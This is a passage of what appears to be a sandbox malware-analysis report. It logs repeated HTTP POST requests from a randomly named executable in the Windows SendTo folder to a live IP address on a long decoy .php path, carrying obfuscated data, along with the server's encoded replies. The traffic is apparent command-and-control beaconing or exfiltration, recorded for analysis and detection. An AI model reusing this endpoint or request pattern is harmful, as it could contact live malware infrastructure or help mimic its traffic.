                                          Data Ascii: ^SCSUF\WY_QQRXTZZRZYU^SDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(,.Z#6 #)=+:?_)+(U(,:]0+29+B1?+1;9[&!^-'
                                          Sep 13, 2024 21:03:57.773118019 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:57.927632093 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          88192.168.2.45675831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:58.058023930 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:58.410717964 CEST2532OUTData Raw: 5b 51 43 5f 55 44 5c 57 59 5f 51 51 52 51 54 56 5a 5a 5a 5d 55 52 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QC_UD\WY_QQRQTVZZZ]URSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9?/*Z#15##-X((-?)>(,"]%3?&9+D%? &;9[&!^-
                                          Sep 13, 2024 21:03:58.791119099 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:58.944931984 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:58 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          89192.168.2.45675931.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:59.081767082 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:59.427350998 CEST2532OUTData Raw: 5b 53 43 50 55 44 59 52 59 5f 51 51 52 5d 54 54 5a 5e 5a 5d 55 57 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [SCPUDYRY_QQR]TTZ^Z]UWSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+&Y T!##=*)+%Y+(0),>]$7&#2?%+9[&!^-3
                                          Sep 13, 2024 21:03:59.835443974 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:59.988482952 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          90192.168.2.45676031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:00.121438026 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:00.473117113 CEST2532OUTData Raw: 5b 56 43 57 55 43 5c 57 59 5f 51 51 52 5c 54 5b 5a 52 5a 5f 55 57 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VCWUC\WY_QQR\T[ZRZ_UWSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+ ")Y #.(8&?,&);8<"]0#,1:#1(Y%9[&!^-7


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          91192.168.2.45676131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:00.791816950 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:01.145128965 CEST2108OUTData Raw: 5b 51 43 54 50 40 59 57 59 5f 51 51 52 50 54 50 5a 5f 5a 51 55 52 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QCTP@YWY_QQRPTPZ_ZQURS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9D+/6]41)7-[)(2R+=Y>(007%*$%(Y2+9[&!^-
                                          Sep 13, 2024 21:04:01.555558920 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:01.709896088 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0c 3c 36 3b 55 30 2b 2f 55 38 5b 2e 57 33 2f 3c 5c 3c 23 08 1a 28 03 3c 1e 2e 04 3d 06 27 15 25 5c 33 3f 3f 58 24 59 33 19 29 2a 2e 46 0d 1d 25 58 2a 2c 20 1f 3e 3e 24 1e 24 58 22 00 23 20 2b 16 24 59 3f 54 37 3c 08 1f 23 31 3f 1c 26 2a 2a 01 2c 36 2e 15 3d 0f 00 5b 37 36 2e 55 0f 15 3a 08 31 08 22 51 3f 0b 24 01 3e 3c 2a 1f 32 2f 24 0e 32 38 34 56 24 01 3a 1d 25 59 29 1f 27 31 33 13 2b 5b 3a 0d 35 21 22 57 22 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:<6;U0+/U8[.W3/<\<#(<.='%\3??X$Y3)*.F%X*, >>$$X"# +$Y?T7<#1?&**,6.=[76.U:1"Q?$><*2/$284V$:%Y)'13+[:5!"W"'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          92192.168.2.45676231.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:00.934387922 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:01.285552025 CEST2528OUTData Raw: 5b 57 46 53 55 41 5c 56 59 5f 51 51 52 59 54 5a 5a 52 5a 59 55 5f 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFSUA\VY_QQRYTZZRZYU_SDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*<*46#*>6U?<*+8'(?='3W29;$,([1;9[&!^-
                                          Sep 13, 2024 21:04:01.679404974 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:01.842885017 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          93192.168.2.45676331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:02.264465094 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:02.613761902 CEST2532OUTData Raw: 5b 57 46 54 55 47 59 54 59 5f 51 51 52 50 54 54 5a 52 5a 51 55 56 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFTUGYTY_QQRPTTZRZQUVSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<42&70)[((&U=,=Z=^8V<*%0 &?1< 19[&!^-
                                          Sep 13, 2024 21:04:03.026252031 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:03.184693098 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          94192.168.2.45676431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:03.304160118 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:03.660779953 CEST2532OUTData Raw: 5e 52 46 52 55 46 59 56 59 5f 51 51 52 51 54 55 5a 5d 5a 5e 55 51 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RFRUFYVY_QQRQTUZ]Z^UQSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+?&#Y75)5?,=Y>; P??)33 V&'E&'19[&!^-
                                          Sep 13, 2024 21:04:04.047297955 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:04.201162100 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          95192.168.2.45676531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:04.336846113 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:04.692369938 CEST2532OUTData Raw: 5e 53 43 51 50 43 5c 51 59 5f 51 51 52 5f 54 51 5a 5e 5a 50 55 57 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^SCQPC\QY_QQR_TQZ^ZPUWSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+/"] #%X(82+<6+(#(,93,U2: %419[&!^-;
                                          Sep 13, 2024 21:04:05.114929914 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:05.250639915 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          96192.168.2.45676631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:05.457201004 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:05.801414013 CEST2532OUTData Raw: 5e 52 43 50 50 47 5c 56 59 5f 51 51 52 5f 54 51 5a 5f 5a 5d 55 5e 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCPPG\VY_QQR_TQZ_Z]U^SAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A??2#19Y 06)+%+[>;?+"Z%0 T1:1<42;9[&!^-;
                                          Sep 13, 2024 21:04:06.371005058 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:06.371572971 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:04:06.371654987 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          97192.168.2.45676731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:06.490175962 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          98192.168.2.45676831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:06.730335951 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:07.082417011 CEST2108OUTData Raw: 5b 57 46 52 55 41 5c 52 59 5f 51 51 52 5f 54 51 5a 53 5a 59 55 52 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFRUA\RY_QQR_TQZSZYURSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+/2]7X"#.=(%?")<Q($42%$X19[&!^-;
                                          Sep 13, 2024 21:04:07.537321091 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:07.698426008 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 56 28 25 27 56 24 28 27 16 2f 03 36 50 24 3f 30 5c 28 33 32 1d 3f 13 1a 1e 3a 3a 22 1d 33 05 2e 00 24 5a 3f 5b 27 01 02 0b 3d 00 2e 46 0d 1d 25 5e 29 3c 3c 1f 29 58 33 02 30 10 26 05 20 09 28 06 33 3f 01 54 20 2c 39 02 37 1c 27 57 25 04 0b 1e 2f 1b 3e 18 3d 08 2e 5e 34 0c 2e 55 0f 15 39 56 31 0f 04 57 3f 32 24 06 29 01 2a 12 32 2f 01 54 26 2b 37 08 27 01 26 57 25 06 22 02 31 31 09 13 3f 3d 39 53 36 1f 3d 08 36 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989V(%'V$('/6P$?0\(32?::"3.$Z?['=.F%^)<<)X30& (3?T ,97'W%/>=.^4.U9V1W?2$)*2/T&+7'&W%"11?=9S6=6+'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          99192.168.2.45676931.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:06.873327017 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:07.223083973 CEST2532OUTData Raw: 5b 5f 43 5f 50 41 59 52 59 5f 51 51 52 51 54 57 5a 5b 5a 50 55 51 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_C_PAYRY_QQRQTWZ[ZPUQSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(2Y41"#U5Y=:?%Z=3(:X$,W%$&/8Z2+9[&!^-
                                          Sep 13, 2024 21:04:07.663408041 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:07.794451952 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:07 GMT
